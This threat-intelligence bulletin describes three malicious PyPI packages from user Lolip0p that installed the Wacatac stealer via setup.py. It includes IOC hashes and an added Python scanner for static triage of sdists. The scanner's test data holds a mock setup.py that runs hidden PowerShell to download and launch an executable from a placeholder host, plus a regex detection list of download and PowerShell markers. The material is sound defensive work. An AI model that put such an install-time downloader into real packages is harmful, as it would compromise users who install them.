Related Families: Wacatac
Executive Summary
Fortinet recently reported on a supply chain attack in which threat actors used three malicious PyPI packages, described by Fortinet as a 0-day attack, to deliver the Wacatac information stealer.
Key Takeaways
- In a recent supply chain attack, threat actors used three malicious PyPI packages, described by Fortinet as a 0-day attack, to deliver a malicious payload to anyone who installed them.
- The malicious packages were all uploaded by the user Lolip0p.
- The payload was Wacatac, an information stealer.
Background
In our recent 2023 Analyst Predictions threat bulletin, we predicted threat actors would continue the software supply chain attack trend, including targeting open-source code repositories. Fortinet recently reported on a supply chain attack in which threat actors leveraged what Fortinet describes as a 0-day attack embedded in three PyPI packages. The malicious packages were ‘colorslib’, ‘httpslib’, and ‘libhttps’, all published in early January by a user known as Lolip0p.
Based on their profile information, Lolip0p apparently joined the PyPI repository shortly before posting the first two packages on January 7th. The third package was published on January 12th. The packages were given legitimate-looking descriptions, but all three were malicious.
According to researchers at Fortinet, all three packages share an identical setup.py script. Because pip runs setup.py when it builds or installs a source distribution, simply installing any of the packages is enough to trigger the payload: the script launches PowerShell to fetch a binary, Oxyz.exe, from a suspicious URL. Oxyz.exe drops a second executable, update.exe, which runs from a temp folder and writes multiple files there. One of the dropped files is SearchProtocolHost.exe, a name borrowed from a legitimate Windows Search component; this file is detected as the Wacatac trojan.
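The practical defence against this pattern is to look at a package's setup.py before pip ever runs it. The script below is an added example, not code from the bulletin or from Fortinet's analysis: it unpacks a .tar.gz sdist in memory, parses setup.py with the ast module (never executing it), and flags install-time command execution and PowerShell/download-style string literals. The two sample packages it scans are constructed stand-ins built inline; the "malicious" one only mimics the shape of the behaviour described above, and its URL, file names and package names are invented placeholders, not the real contents of colorslib, httpslib or libhttps.

```python
"""Static triage of a PyPI sdist's setup.py before installation.

Added example (not part of the bulletin). Sample packages are constructed
stand-ins; the URL and names inside them are invented placeholders.
"""
import ast
import io
import re
import tarfile

# Call targets that let setup.py run arbitrary commands at install time.
EXEC_CALLS = {
    "os.system", "os.popen", "subprocess.run", "subprocess.call",
    "subprocess.Popen", "subprocess.check_output", "subprocess.check_call",
}
# String fragments that rarely belong in a legitimate build script.
SUSPICIOUS_STRINGS = re.compile(
    r"powershell|https?://|-enc\b|-encodedcommand|\biex\b|invoke-webrequest|"
    r"downloadfile|\.exe\b|base64",
    re.IGNORECASE,
)


def _dotted_name(node):
    """Return 'a.b.c' for a Name/Attribute call target, or None if it is not one."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def scan_setup_py(source):
    """Parse setup.py text with ast (no execution) and return a list of findings."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            name = _dotted_name(node.func)
            if name in EXEC_CALLS:
                findings.append(f"line {node.lineno}: command execution via {name}()")
            elif name in {"exec", "eval", "__import__"}:
                findings.append(f"line {node.lineno}: dynamic code via {name}()")
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            match = SUSPICIOUS_STRINGS.search(node.value)
            if match:
                findings.append(f"line {node.lineno}: suspicious literal {match.group(0)!r}")
    return findings


def scan_sdist(sdist_bytes):
    """Locate the top-level setup.py inside a .tar.gz sdist (as bytes) and triage it."""
    with tarfile.open(fileobj=io.BytesIO(sdist_bytes), mode="r:gz") as tar:
        for member in tar.getmembers():
            # sdists are laid out as <name>-<version>/setup.py
            if member.isfile() and member.name.count("/") == 1 \
                    and member.name.endswith("/setup.py"):
                return scan_setup_py(tar.extractfile(member).read().decode("utf-8"))
    return ["no setup.py found (pyproject-only sdist?)"]


def make_sdist(name, setup_py):
    """Build an in-memory tar.gz sdist holding only setup.py (constructed test data)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        data = setup_py.encode("utf-8")
        info = tarfile.TarInfo(f"{name}-1.0.0/setup.py")
        info.size = len(data)
        tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


# Constructed benign package: declares metadata and nothing else.
BENIGN_SETUP = '''\
from setuptools import setup
setup(name="colors-helper", version="1.0.0", py_modules=["colors_helper"])
'''

# Constructed lookalike of the install-time downloader pattern. The URL is a
# placeholder (RFC 2606 .invalid TLD); this is NOT the real malicious script.
MALICIOUS_SETUP = '''\
import subprocess
from setuptools import setup
subprocess.Popen(
    ["powershell", "-w", "hidden", "-c",
     "Invoke-WebRequest http://example.invalid/Oxyz.exe -OutFile $env:TEMP/Oxyz.exe; "
     "Start-Process $env:TEMP/Oxyz.exe"])
setup(name="colorslib-lookalike", version="1.0.0")
'''

if __name__ == "__main__":
    for label, src in (("benign", BENIGN_SETUP), ("malicious", MALICIOUS_SETUP)):
        print(label, scan_sdist(make_sdist(label, src)) or ["clean"])
```

Run it against a real download with `pip download --no-deps --no-binary :all: <package>` and feed the resulting .tar.gz bytes to scan_sdist; a hit does not prove malice (some build scripts legitimately shell out), but any network URL or PowerShell invocation in setup.py deserves a manual read before installation. Wheels skip setup.py entirely, so a package that ships both should have its sdist checked separately.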
What is Wacatac?
Wacatac is an information stealer that harvests multiple types of victim data, including login credentials and banking information. Threat actors can also use Wacatac as a foothold to deploy additional payloads, such as ransomware.
IOCs
PolySwarm has multiple samples associated with this activity.
8dc8a9f5b5181911b0f4a051444c22e12d319878ea2a9eaaecab9686e876690b (Oxyz.exe)
293a3a2c8992636a5dba58ce088feb276ba39cf1b496b336eb7b6f65b1ddb757 (Update.exe)
You can use the following CLI command to search for all related samples in our portal:
$ polyswarm link list -f Lolip0p
Don’t have a PolySwarm account? Go here to sign up for a free Community plan or to subscribe.
Contact us at hivemind@polyswarm.io | Check out our blog | Subscribe to our reports